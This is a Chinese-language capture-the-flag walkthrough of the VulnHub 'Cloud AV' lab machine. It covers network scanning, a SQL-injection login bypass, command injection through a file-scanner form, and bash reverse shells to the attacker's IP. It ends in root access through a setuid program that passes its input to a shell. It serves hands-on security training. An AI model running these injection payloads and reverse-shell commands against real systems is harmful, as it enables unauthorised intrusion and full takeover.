准备
-
下载靶机(Target):https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/
-
靶机推荐使用 VirtualBox 导入,注意以下两个设置
- 显示 --> 显卡控制器 -->
VMSVGA
- USB 设备 -->
USB 1.1 (OHCI) 控制器
- 显示 --> 显卡控制器 -->
-
配置网络环境:https://www.cnblogs.com/shadow-/p/16815020.html
- kali: NAT + [ Bridged/Host-Only ]
- 靶机: Host-Only
完成上面内容后,需要对 kali 与 target 做 快照记录 当前环境和布置,以免实验过程中出现错误造成不可挽回的损失
打靶流程
发现目标
此过程一般使用 Kali 中扫描工具 arp-scan, nmap, Fping, Nping, Arping, Nbtscan, ...
一般推荐 arp-scan 使用简单
-
使用
sudo arp-scan -l -I eth1
寻找目标,发现目标192.168.56.109
┌──(kali㉿kali)-[~] └─$ sudo arp-scan -l -I eth1 127 ⨯ Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111 Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered) 192.168.56.100 08:00:27:4d:8e:be PCS Systemtechnik GmbH 192.168.56.109 08:00:27:17:f5:a8 PCS Systemtechnik GmbH 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.8: 256 hosts scanned in 2.201 seconds (116.31 hosts/sec). 3 responded
- 在 arp-scan 中参数
-I
是--interface=
简写作用是指定扫描的接口,如果没有默认扫描 eth0 - 在不知道网段使用
-l
参数,当然也可以直接填写需要扫描的网段 - 应当核实第一步,可以在 VirtualBox 上查看靶机的 MAC 地址与上面的目标是否相同,这一步也是验证前面准备时的配置是否有用
- 在 arp-scan 中参数
-
使用 nmap 对目标进行端口扫描,一个经典的 nmap 扫描命令
nmap -A -T4 192.168.56.109
即可┌──(kali㉿kali)-[~] └─$ nmap -A -T4 192.168.56.109 1 ⨯ Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-23 14:29 CST Nmap scan report for 192.168.56.109 Host is up (0.0011s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 6a424b7c2a060f504b32cfb831e9c4f4 (RSA) | 256 81c7600fd71e56f7a31e9f7627bd3127 (ECDSA) |_ 256 7190c326ba3be8b3537e7353274d6baf (ED25519) 8080/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15rc1) |_http-server-header: Werkzeug/0.14.1 Python/2.7.15rc1 |_http-title: Site doesn't have a title (text/html; charset=utf-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.83 seconds
-
参数
-A
用来进行操作系统及其版本的探测 -
参数
-T4
可以加快执行速度 -
从扫描结果我们可以得到以下信息
- 操作系统 OS 是 Linux
- 开放了两个端口 22/tcp(ssh: OpenSSH 7.6p1 Ubuntu 4), 8080/tcp(http: Werkzeug httpd 0.14.1)
-
注入测试
对于 ssh 目前没有头绪,我们可以尝试访问其开发的 http 服务
-
使用浏览器访问
http://192.168.56.109:8080/
,是一个普通网页,我们可以在网页中查看源码<html> <body> <h1>Cloud Anti-Virus Scanner!</h1> <h2>This is a beta Cloud Anti-Virus Scanner service.</h2> <h3>Please enter your invite code to start testing</h3> <form action="/login" method="POST"> <input type="text" name="password" placeholder="Invite Code"> <input type="submit" value="Log in"> </form> </body> </html>
- 通过源码分析,发现一个以 POST 方式提交的表单,其中只有一个名为 password 的数据
- 表单提交指向
/login
网页,我们可以大致推理出,这个表单提交的数据是用于登录 - 此处可以尝试进行注入测试
-
在网站这发现网页内容中查找可能的注入点,我们可以使用
sqlmap
进行测试- 新建一个文件 target.txt
- 使用 Kali 的 Firefox-ESR 在页面
http://192.168.56.109:8080/
使用 Ctrl + Shift + I 打开 Web 开发者工具 - Web 开发者工具中的网络工具对页面
http://192.168.56.109:8080/login
设置拦截 - 在页面
http://192.168.56.109:8080/
发送上面表单的 POST 请求 - 复制拦截的该请求的请求头和请求数据到 target.txt 文件中
- 使用命令
sqlmap -r target.txt -f --level 4 --risk 3
┌──(kali㉿kali)-[~/workspace] └─$ sqlmap -r testsql.txt -f --level 4 --risk 3 ___ __H__ ___ ___[']_____ ___ ___ {1.6.10#stable} |_ -| . [(] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 15:18:43 /2022-10-23/ [15:18:43] [INFO] parsing HTTP request from 'testsql.txt' [15:18:43] [INFO] testing connection to the target URL [15:18:44] [INFO] testing if the target URL content is stable [15:18:44] [INFO] target URL content is stable [15:18:44] [INFO] testing if POST parameter 'password' is dynamic [15:18:44] [WARNING] POST parameter 'password' does not appear to be dynamic [15:18:44] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable [15:18:45] [INFO] testing for SQL injection on POST parameter 'password' [15:18:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [15:18:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause' got a refresh intent (redirect like response common to login pages) to '/scan'. Do you want to apply it from now on? [Y/n] Y [15:18:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)' [15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable [15:18:55] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite' it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y for the remaining tests, do you want to include all tests for 'SQLite' extending provided level (4) value? [Y/n] Y [15:19:14] [INFO] testing 'Generic inline queries' [15:19:14] [INFO] testing 'SQLite inline queries' [15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)' [15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)' [15:19:14] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)' [15:19:14] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)' [15:20:15] [INFO] POST parameter 'password' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable [15:20:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [15:20:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
- 从中可以看出存在注入点,并且 DBMS 可能是 SQLite
- 并且从
[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable
可以看出注入类型OR boolean-based
-
构造 SQL 注入语句,已知注入类型
OR boolean-based
可以尝试比较通用的语句" or 1=1--
做为页面http://192.168.56.109:8080/
中表单的password
值进行提交表单
到目前为止,我们成功登录 http://192.168.56.109:8080/scan
页面,通过简单的探索发现此页面是这个 Web 应用的后台管理页面,
其中存在数据提交,但通过关键词 Try scanning some of these files with our scanner!
知道传入的数据是被某种程序进行查杀,更多的是涉及 shell 中执行
<html>
<body>
<h1>Cloud Anti-Virus Scanner!</h1>
<h3>Try scanning some of these files with our scanner!</h3>
<pre>total 4756
-rwxr-xr-x 1 scanner scanner 1113504 Oct 21 2018 bash
-rwxr-xr-x 1 scanner scanner 34888 Oct 21 2018 bzip2
-rwxr-xr-x 1 scanner scanner 35064 Oct 21 2018 cat
-rw-rw-r-- 1 scanner scanner 68 Oct 21 2018 eicar
-rw-rw-r-- 1 scanner scanner 5 Oct 21 2018 hello
-rwxr-xr-x 1 scanner scanner 35312 Oct 21 2018 netcat
-rwxr-xr-x 1 scanner scanner 3633560 Oct 21 2018 python
</pre>
<form action="/output" method="POST">
<input type="filename" name="filename" placeholder="File Name">
<input type="submit" value="Scan!">
</form>
</body>
</html>
我们可以尝试使用 |
管道进行命令串联,改变回返的数据内容,并夹杂我们想要的信息
-
输入尝试
a | id
得到了下面结果,这说明其中的数据没有过滤,我们可以通过这个执行命令uid=1001(scanner) gid=1001(scanner) groups=1001(scanner)
反弹 shell
-
通过这个漏洞,我们可以构建一个
a | ls | grep 'xxxxx' | 想要执行的命令
-
我们可以查看是否存在
wget
有助于木马上传,配合 metasploit 攻击 -
也可以使用 nc 反弹 shell 依次执行下面命令,但上面的 nc 版本不利于反弹,也可以使用 nc 实现但比较麻烦
-
nc 上传 bash 反弹木马程序
- 表单提交
a | ls | grep 'xxxxx' | touch a.sh
- 表单提交
a | ls | grep 'xxxxx' | nc -l -p 4444 -w6 > a.sh
- 在 kali 执行
nc 192.168.56.109 4444 < 'bash -i >& /dev/tcp/192.168.56.111/23333 0>&1'
- 在 kali 执行
netcat -lvp 23333
监听端口 - 表单提交
a | ls | grep 'xxxxx' | bash a.sh
反弹 shell
- 表单提交
┌──(kali㉿kali)-[~/workspace] └─$ netcat -lvp 23333 listening on [any] 23333 ... 192.168.56.109: inverse host lookup failed: Unknown host connect to [192.168.56.111] from (UNKNOWN) [192.168.56.109] 52396 bash: cannot set terminal process group (694): Inappropriate ioctl for device bash: no job control in this shell scanner@cloudav:~/cloudav_app$ ls ls app.py a.sh database.sql get-pip.py get-pip.py.1 get-pip.py.2 get-pip.py.3 samples templates scanner@cloudav:~/cloudav_app$
- 成功反弹 shell
-
本质上此用户 scanner 的可行动服务就非常高,随便的方法都能攻破【不在进行其他 shell 反弹演示,有需求自行查找】
探索目标
我们已经进入目标的内部,我们探索一下目录、文件
-
我们在用户根目录发现一个有特殊权限的文件
-rwsr-xr-x 1 root scanner 8.4K Oct 24 2018 update_cloudav
scanner@cloudav:~$ ls -alh ls -alh total 60K drwxr-xr-x 6 scanner scanner 4.0K Oct 24 2018 . drwxr-xr-x 4 root root 4.0K Oct 21 2018 .. -rw------- 1 scanner scanner 5 Oct 24 2018 .bash_history -rw-r--r-- 1 scanner scanner 220 Oct 21 2018 .bash_logout -rw-r--r-- 1 scanner scanner 3.7K Oct 21 2018 .bashrc drwx------ 2 scanner scanner 4.0K Oct 21 2018 .cache drwxrwxr-x 4 scanner scanner 4.0K Oct 23 10:59 cloudav_app drwx------ 3 scanner scanner 4.0K Oct 21 2018 .gnupg drwxrwxr-x 3 scanner scanner 4.0K Oct 21 2018 .local -rw-r--r-- 1 scanner scanner 807 Oct 21 2018 .profile -rw-rw-r-- 1 scanner scanner 66 Oct 21 2018 .selected_editor -rwsr-xr-x 1 root scanner 8.4K Oct 24 2018 update_cloudav -rw-rw-r-- 1 scanner scanner 393 Oct 24 2018 update_cloudav.c
- 在linux中,
-s
指的是强制位权限,具有程序运行时子进程权限继承,s 权限位是一个敏感的权限位,容易造成系统的安全问题 - 其中还含有源码 update_cloudav.c 我们可以查看源码,发现执行此命令需要一个参数,我们完全可以故技重施
#include <stdio.h> int main(int argc, char *argv[]) { char *freshclam="/usr/bin/freshclam"; if (argc < 2){ printf("This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam\n"); return 1; } char *command = malloc(strlen(freshclam) + strlen(argv[1]) + 2); sprintf(command, "%s %s", freshclam, argv[1]); setgid(0); setuid(0); system(command); return 0; }
- 在linux中,
-
获取 root 权限
- Kali 设置
netcat -lvp 4444
监听 4444 端口 - 靶机上 shell 反弹
touch b.sh && echo 'bash -i >& /dev/tcp/192.168.56.111/4444 0>&1' > b.sh && ./update_cloudav "a | ls | grep 'xxxxx' | bash b.sh"
┌──(kali㉿kali)-[~] └─$ netcat -lvp 4444 listening on [any] 4444 ... 192.168.56.109: inverse host lookup failed: Unknown host connect to [192.168.56.111] from (UNKNOWN) [192.168.56.109] 56672 bash: cannot set terminal process group (694): Inappropriate ioctl for device bash: no job control in this shell root@cloudav:~# id id uid=0(root) gid=0(root) groups=0(root),1001(scanner)
- Kali 设置
游戏结束 GAMEOVER